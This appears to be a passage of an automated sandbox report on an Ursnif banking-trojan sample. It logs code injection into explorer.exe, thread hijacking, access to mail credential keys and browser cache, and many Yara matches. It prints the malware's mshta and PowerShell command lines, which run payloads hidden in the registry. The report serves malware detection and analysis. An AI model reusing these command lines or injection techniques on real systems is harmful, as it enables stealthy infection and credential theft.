Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9F6000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 2B30000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3424 base: 9FA000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3424 base: 2B60000 value: 80
Source: C:\Windows\System32\control.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Thread register set: target process: 4936 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\System32\control.exe Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe Thread register set: target process: 4972
Source: C:\Windows\explorer.exe Thread register set: target process: 3656
Source: C:\Windows\explorer.exe Thread register set: target process: 6752
Source: C:\Windows\explorer.exe Thread register set: target process: 4268
Source: C:\Windows\explorer.exe Thread register set: target process: 4772
Source: C:\Windows\explorer.exe Thread register set: target process: 5844
Source: C:\Windows\explorer.exe Thread register set: target process: 6656
Source: C:\Windows\explorer.exe Thread register set: target process: 1380
Source: C:\Windows\System32\cmd.exe Thread register set: target process: 2280
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD669.tmp" "c:\Users\user\AppData\Local\Temp\pqwen5zh\CSC508E00641FC7448693989664B7E60.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF386.tmp" "c:\Users\user\AppData\Local\Temp\i3mkzvx5\CSCB52324015C2F4AC8AC468C73504A2519.TMP" Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: explorer.exe, 00000016.00000000.855987262.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: control.exe, 00000014.00000000.823797998.0000027A713E0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.848064670.0000000001080000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000019.00000000.887067062.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001C.00000002.1198527861.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001F.00000000.962642219.000001DA4A460000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.990187283.00000235BF790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.1042620423.0000029865990000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: control.exe, 00000014.00000000.823797998.0000027A713E0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.860866821.0000000005E50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.887067062.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001C.00000002.1198527861.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001F.00000000.962642219.000001DA4A460000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.990187283.00000235BF790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.1042620423.0000029865990000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000014.00000000.823797998.0000027A713E0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.848064670.0000000001080000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000019.00000000.887067062.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001C.00000002.1198527861.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001F.00000000.962642219.000001DA4A460000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.990187283.00000235BF790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.1042620423.0000029865990000.00000002.00020000.sdmp Binary or memory string: Progman
Source: control.exe, 00000014.00000000.823797998.0000027A713E0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.848064670.0000000001080000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000019.00000000.887067062.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001C.00000002.1198527861.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001F.00000000.962642219.000001DA4A460000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.990187283.00000235BF790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.1042620423.0000029865990000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000016.00000000.843356793.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C57A2E cpuid 1_2_03C57A2E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_00401E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_00401E22
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C57A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_03C57A2E
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FEDF1C CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_01FEDF1C
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_00401752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_00401752

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.754079690.00000000046BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.889480040.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708583550.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.960938374.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964489842.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708535895.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.890926362.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753558505.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708632359.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067279297.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067191125.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.894411476.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067358328.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964378185.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708655559.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826726374.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.961019371.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708643513.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826674348.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067387619.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708560736.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974756035.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067321148.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067077802.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067242360.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.1069046396.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067447371.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708619404.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974847238.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.752543235.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: anIV2qJeLD.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: PING.EXE PID: 2280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 5844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 6656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1380, type: MEMORYSTR
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.48394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.anIV2qJeLD.exe.3c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.4864ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.973836822.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.824591176.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753488992.00000000047BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.978653062.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1012362960.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1042231528.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.822930430.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.933683599.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.934438300.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.885186030.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.972065324.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.899852132.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1024798927.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.925739991.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753518401.0000000004839000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1039859823.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.895713343.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.970372197.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.887028110.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.947593693.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.936725813.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.974956334.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.825845900.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.970221418.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.961075351.0000000004299000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.883404432.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.905548648.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.968828960.00000000044C0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.942244917.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918958280.00000168AA1CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1037934763.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1018627233.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.754079690.00000000046BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.889480040.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708583550.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.960938374.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964489842.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708535895.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.890926362.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753558505.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708632359.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067279297.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067191125.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.894411476.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067358328.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964378185.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708655559.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826726374.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.961019371.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708643513.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826674348.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067387619.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708560736.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974756035.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067321148.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067077802.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067242360.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.1069046396.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067447371.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708619404.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974847238.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.752543235.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: anIV2qJeLD.exe PID: 6968, type: MEMORYSTR
